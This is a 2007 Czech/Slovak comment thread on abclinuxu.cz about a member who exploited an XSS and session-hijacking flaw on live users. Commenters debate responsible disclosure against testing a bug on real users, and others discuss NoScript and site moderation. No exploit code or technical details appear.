    Pokud někdo přeťápne tu pomyslnou měkkou hranici, je namístě jej na to upozornit – právě to upozornění je ten způsob hlídání (místo technického zákazu). Nebo by snad bylo rozumné potajmu pozorovat, jak lidé překračují nějakou hranici stále víc, a pak najednou implementovat nějaké technické omezení? To mi daleko lepší připadá na věc upozornit – třeba to dotyčný neudělal schválně, upozorní to i ostatní, a žádné technické omezení nebude potřeba. A až někdo bude mít jednou pádný důvod založit si novou identitu, nebude mu v tom bránit žádné technické omezení.
    24.7.2007 17:31 zalesak
    Rozbalit Rozbalit vše Re: No nechapem
    nj.. preco teda odstranovat chybu, ktoru popisuje tento clanok.. proste to vyrieste "domluvou" a nechajte to tak :) vyuzit ju je takisto neziaduce spravanie ako zalozit "testovaci blog"...
    24.7.2007 19:05 Filip Jirsák | skóre: 67 | blog: Fa & Bi
    Rozbalit Rozbalit vše Re: No nechapem
    Protože chyba zmiňovaná v blogu je trochu závažnější. A navíc, ona minimálně rok „domluvou“ řešena byla, ta chyba přece opravena nebyla – ale teď se ukázalo, že už se mezi blogujícími abclinuxáky nedá spoléhat na to, že tu chybu nezneužijí, případně pokud na ni někdo narazí, tak ji opraví a pošle patch. Víc už k té chybě psát nebudu, asi by to nebylo rozumné…
    24.7.2007 19:27 azurIt | skóre: 34 | blog: zatial_bez_mena
    Rozbalit Rozbalit vše Re: No nechapem
    chybu som nasiel nezavisle na tom, co bolo v bugzille (to som sa dozvedel az nakoniec od Leosa). okrem toho, ako on sam povedal, neuvedomil si jej mozne nasledky (a vlastne preto jej nevenoval az taku pozornost, aku si 'zasluzila').
    24.7.2007 21:02 Filip Jirsák | skóre: 67 | blog: Fa & Bi
    Rozbalit Rozbalit vše Re: No nechapem
    neuvedomil si jej mozne nasledky (a vlastne preto jej nevenoval az taku pozornost, aku si 'zasluzila').
    Což je mimochodem hezký praktický příklad toho, proč raději než si s chybou nejdřív „pohrát“ je lepší nalezenou chybu rovnou oznámit adminovi nebo autorovi, který si asi snáz dovede dát dohromady možné následky. A to teď nemyslím jen tento konkrétní případ, ale obecně.
    24.7.2007 21:15 azurIt | skóre: 34 | blog: zatial_bez_mena
    Rozbalit Rozbalit vše Re: No nechapem
    hadam naopak, nie ? ;) je to pekny priklad toho, preco sa s tym najskor pohrat a ukazat, ze sa naozaj jedna o problem - chyba bola znama uz rok ale Leos v nej bezpecnostne riziko nevidel cize ju neopravil.
    24.7.2007 21:35 Filip Jirsák | skóre: 67 | blog: Fa & Bi
    Rozbalit Rozbalit vše Re: No nechapem
    Vy jste napsal, že jste si neuvědomil možné důsledky – pochopil jsem to jako možné důsledky té chyby. Kdyby k té chybě kdokoli připojil poznámku nebo komukoli z adminů nebo programátorů Abíčka řekl, že je možné té chyby zneužít ke vkládání vlastních javascriptů, určitě by to dotyčný za bezpečnostní riziko považoval a odpovídajícím způsobem by jednal.
    24.7.2007 21:42 azurIt | skóre: 34 | blog: zatial_bez_mena
    Rozbalit Rozbalit vše Re: No nechapem
    napisal som '...okrem toho, ako on sam povedal, neuvedomil si jej mozne nasledky...' a hovoril som o Leosovi. alebo to nebolo jasne ? a prosim ta nevykaj mi (kedze to ani nevies: 'Vy jste napsal ').
    24.7.2007 21:54 Filip Jirsák | skóre: 67 | blog: Fa & Bi
    Rozbalit Rozbalit vše Re: No nechapem
    Aha, omlouvám se, četl jsem ako som sam povedal… V tom vykání nebyl žádný špatný úmysl, jsem zvyklý lidem, které neznám, vykat, a to i na internetu. Vím, jsem v tom poněkud mimo hlavní proud…
    24.7.2007 22:23 azurIt | skóre: 34 | blog: zatial_bez_mena
    Rozbalit Rozbalit vše Re: No nechapem
    :) nic sa samozrejme nestalo
    24.7.2007 21:52 Leoš Literák | skóre: 74 | blog: LL | Praha
    Rozbalit Rozbalit vše Re: No nechapem
    Uz jsme tu parkrat meli bezpecnostni problem a dosud mi lide soukrome poslali popis problemu, ja jsem si jej doma na lokale zreprodukoval a opravil. Jsi prvni, kdo chybu zneuzil na realnych uzivatelich. To je ten rozdil v tvem pristupu.
    Zakladatel tohoto portálu. Twitter, LinkedIn, blog, StackOverflow
    24.7.2007 22:23 azurIt | skóre: 34 | blog: zatial_bez_mena
    Rozbalit Rozbalit vše Re: No nechapem
    raz niekto taky musel prist ;)
    frEon avatar 24.7.2007 17:10 frEon | skóre: 40 | Praha
    Rozbalit Rozbalit vše Re: No nechapem
    jenze komentare pod neexistujicim blogem postradaji nejak smysl, ze
    Talking about music is like dancing to architecture.
    24.7.2007 17:14 azurIt | skóre: 34 | blog: zatial_bez_mena
    Rozbalit Rozbalit vše Re: No nechapem
    ked zmazes obsah blogu (na co pravo mas), dostanes to iste. takze v tomto smere by nebola ziadna zmena.
    24.7.2007 13:18 Robo
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    Toto je jedna z pricin preco sa radsej nikde neregistrujem :)
    24.7.2007 13:20 Robo
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    a samozrejme pouzivam NoScript, ale iba doma cez FF
    Joseph avatar 24.7.2007 14:20 Joseph | skóre: 7 | blog: No_bullshiting_please | Ba'aretz
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    a druha pricina? a noscript ocenujem. je to spravna sek u riti vychytavka. teda spolu s rozumom usera.
    אם אין אני לי, מי לי; וכשאני לעצמי, מה אני; ואם לא עכשיו, אימתי.(פרקי אבות, פרק א, משנה יד
    24.7.2007 14:42 Robo
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    tych pricin bude viac, napr. si nemusis pamatat hesla, tiez som lenivy sa zaregistrovat, mensia moznost dostavat spam ... co ma zatial napada.
    jnc avatar 24.7.2007 18:05 jnc | skóre: 6
    Rozbalit Rozbalit vše Re: XSS + Session hijacking = Hack abclinuxu.cz
    napr. si nemusis pamatat hesla
    To nemusíš ani tak ;)

    Založit nové vláknoNahoru

    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.